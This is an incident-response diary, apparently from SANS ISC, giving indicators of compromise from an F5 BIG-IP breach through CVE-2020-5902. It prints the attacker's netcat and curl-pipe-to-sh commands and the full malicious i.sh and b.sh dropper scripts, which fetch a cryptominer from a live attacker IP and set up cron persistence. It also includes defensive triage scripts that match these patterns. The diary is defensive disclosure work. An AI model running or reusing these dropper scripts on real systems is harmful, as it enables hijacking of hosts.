A few IoCs related to CVE-2020-5902
I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902. As I responded I captured a number of indicators of compromise. While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.
The F5 vulnerability, CVE-2020-5902, was announced, with patches and workarounds made available, by F5 on June 30, 2020. It carried a CVSS score of 10, which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.
On this particular F5, probes for the presence of the vulnerability began on July 3, 2020, and over the course of the subsequent 4 days the device was probed for vulnerability to CVE-2020-5902 2561 times from 364 unique IPs.
The first detectable exploit was executed against the F5 on July 4, 2020. Exploits continued to be executed against the F5 a number of times over the next few days. It is hard to gauge the effectiveness of these exploits, but there is no indication that any of them achieved an effective foothold in the F5.
The first detectable foothold in the F5 was on July 6, 2020. As shown in an earlier diary, an alias was used to get access to a shell, which was used to execute:
nc 217.12.199.179 9999
which resulted in the execution of:
curl 217.12.199.179/i.sh | sh
As of writing, 217.12.199.179 is still up and is still serving the shell scripts related to this attack.
Here are the contents of i.sh
SHA-256 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ]; then
WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
WGET="wget -O"
fi
DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
rm -rf /tmp/bigip
sleep 1
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]; then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
download() {
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
$WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download3
;;
esac
else
echo "No md5sum"
download3
fi
}
download3() {
$WGET $DIR/bigip http://217.12.199.179/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
;;
esac
else
echo "No md5sum"
fi
}
download
SKL=b $DIR/bigip
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh adds a recurring cron job (every minute) which fetches and executes a second script, b.sh, from the same IP.
Here are the contents of b.sh
SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh also downloaded an executable called bigip to /var/tmp, which launched a process (daemon) on the F5, /tmp/bigipdaemon.
SHA-256 c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection
SHA-256 517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection
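The persistence and drop behaviour described above (the every-minute crontab entry pointing at 217.12.199.179, the bigip binary whose md5 i.sh verifies, and the bigipdaemon process) can be checked for on a host with a few small shell functions. The script below is an added example for this diary, not something recovered from the incident; each check takes its input as an argument so it can be run over a saved crontab listing or ps output from an image as well as on the live box, and the file hash check falls back to openssl when sha256sum/md5sum are absent. The cron check also flags any cron line that pipes a curl/wget download into sh, since that pattern is the mechanism here regardless of the IP. Note that crontab -l only lists the invoking user's crontab; /etc/cron.d and other users' crontabs need a separate look.

```shell
#!/bin/sh
# Added example (not from the diary): host-side triage for the IoCs above.

IOC_IP="217.12.199.179"
IOC_IP_RE=$(printf '%s' "$IOC_IP" | sed 's/\./\\./g')   # literal dots for grep -E
IOC_BIGIP_MD5="fa3cf35e7e83175f395a5b6d35fd456d"          # the md5 i.sh checks for
IOC_BIGIP_SHA256="c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76"
IOC_DAEMON_SHA256="517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d"

# Exit 0 (and print the offending lines) if the crontab text in $1 references the
# attacker IP or pipes a curl/wget download straight into sh.
crontab_has_ioc() {
    printf '%s\n' "$1" | grep -E -e "$IOC_IP_RE" -e '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
}

# Exit 0 (and print the matching lines) if the ps output in $1 shows the dropped
# binary (bigip) or its daemon (bigipdaemon) as a process name or path component.
ps_has_ioc() {
    printf '%s\n' "$1" | grep -E '(^|[[:space:]/])bigip(daemon)?([[:space:]]|$)'
}

# Hash helpers: print the digest of file $1 using whichever tool is present.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | awk '{ print $1 }'
    else openssl dgst -sha256 "$1" 2>/dev/null | awk '{ print $NF }'; fi
}
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | awk '{ print $1 }'
    else openssl dgst -md5 "$1" 2>/dev/null | awk '{ print $NF }'; fi
}

# Exit 0 if the lower-case hex digest in $1 is one of the known sample hashes.
hash_is_ioc() {
    case "$1" in
        "$IOC_BIGIP_MD5"|"$IOC_BIGIP_SHA256"|"$IOC_DAEMON_SHA256") return 0 ;;
        *) return 1 ;;
    esac
}

# Exit 0 if file $1 hashes (sha256 or md5) to one of the known samples.
file_is_ioc() {
    hash_is_ioc "$(file_sha256 "$1")" || hash_is_ioc "$(file_md5 "$1")"
}

# Live-host run: gather inputs from this machine and report. Exit 0 means clean.
# The drop directory in i.sh is /tmp, /var/tmp or a mktemp(1) directory, so the
# fixed paths below are only the common cases; ps_has_ioc covers a running copy.
triage() {
    rc=0
    crontab_has_ioc "$(crontab -l 2>/dev/null)" && rc=1
    ps_has_ioc "$(ps -ef 2>/dev/null)" && rc=1
    for f in /tmp/bigip /tmp/bigipdaemon /var/tmp/bigip /var/tmp/bigipdaemon; do
        [ -f "$f" ] && file_is_ioc "$f" && echo "known sample at $f" && rc=1
    done
    return $rc
}

case "${1:-}" in --run) triage ;; esac
```

Run it as `sh triage.sh --run` on the host (or source the file and call the individual functions against saved artifacts); a non-zero exit means at least one indicator was found.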
The files are a cryptominer, which mines cryptocurrency on behalf of the attacker. The firewall logs clearly show the cryptominer communicating with the IP in Ukraine from which the shell scripts were downloaded.
Besides the IP associated with the cryptomining, the attacker also communicated with 9 other IPs.
Cryptominer IP:
destination_address  destination_port  Country
217.12.199.179       80                Ukraine
Other associated IPs:
destination_address  destination_port  Country
193.26.217.129       80                Russia
193.53.127.188       80                Russia
213.226.114.20       80                Russia
213.32.10.148        80                France
45.8.228.49          80                Russia
5.23.52.131          80                Russia
62.109.25.117        80                Russia
95.142.44.164        80                Russia
217.8.117.137        80                Russia
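To put the destination IPs above to use against firewall logs, the awk-based matcher below (an added example, not part of the diary or of any firewall product) reads log lines on stdin and prints the ones whose dst= field is one of the listed addresses. The log format is constructed for the example (space-separated key=value pairs); the field name is the only thing to adapt for a real export. It compares the whole dst token rather than grepping for substrings, so 45.8.228.49 does not also flag 145.8.228.49 or 45.8.228.491, a classic false-positive source when IoC lists are searched with plain grep.

```shell
#!/bin/sh
# Added example (not from the diary): match egress firewall log lines against
# the destination IPs listed in the diary.

IOC_DST_IPS="217.12.199.179 193.26.217.129 193.53.127.188 213.226.114.20 \
213.32.10.148 45.8.228.49 5.23.52.131 62.109.25.117 95.142.44.164 217.8.117.137"

# Reads log lines on stdin; prints "IOC <ip>: <line>" for every line whose
# dst=<ip> field is in the list (exact token match). Exit 0 if anything matched.
fw_log_matches() {
    awk -v list="$IOC_DST_IPS" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) ioc[a[i]] = 1 }
        {
            for (i = 1; i <= NF; i++)
                if (substr($i, 1, 4) == "dst=" && (substr($i, 5) in ioc)) {
                    hits++; print "IOC " substr($i, 5) ": " $0; break
                }
        }
        END { exit hits ? 0 : 1 }'
}

# Prints the number of matching lines in the log text passed as $1 (0 if none).
count_fw_log_matches() {
    printf '%s\n' "$1" | fw_log_matches | wc -l | tr -d ' '
}

# Constructed sample log: two true hits (lines 1 and 3), one near-miss on a
# longer address that shares a suffix (line 2), and one unrelated line.
SAMPLE_LOG='Jul 06 2020 14:02:11 fw1 action=allow src=10.20.30.40 dst=217.12.199.179 dport=80 proto=tcp
Jul 06 2020 14:02:12 fw1 action=allow src=10.20.30.40 dst=145.8.228.49 dport=443 proto=tcp
Jul 06 2020 14:02:13 fw1 action=allow src=10.20.30.40 dst=5.23.52.131 dport=80 proto=tcp
Jul 06 2020 14:02:14 fw1 action=allow src=10.20.30.40 dst=8.8.8.8 dport=53 proto=udp'

# Run the matcher over the sample when invoked with --demo; otherwise the
# functions can be sourced and fed a real log, e.g.  fw_log_matches < fw.log
case "${1:-}" in --demo) printf '%s\n' "$SAMPLE_LOG" | fw_log_matches ;; esac
```

Over the constructed sample the matcher reports exactly the two lines to 217.12.199.179 and 5.23.52.131; the 145.8.228.49 line is correctly left alone even though a substring search for 45.8.228.49 would have caught it.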
I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime. If anyone has any more related IoCs, please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.
-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)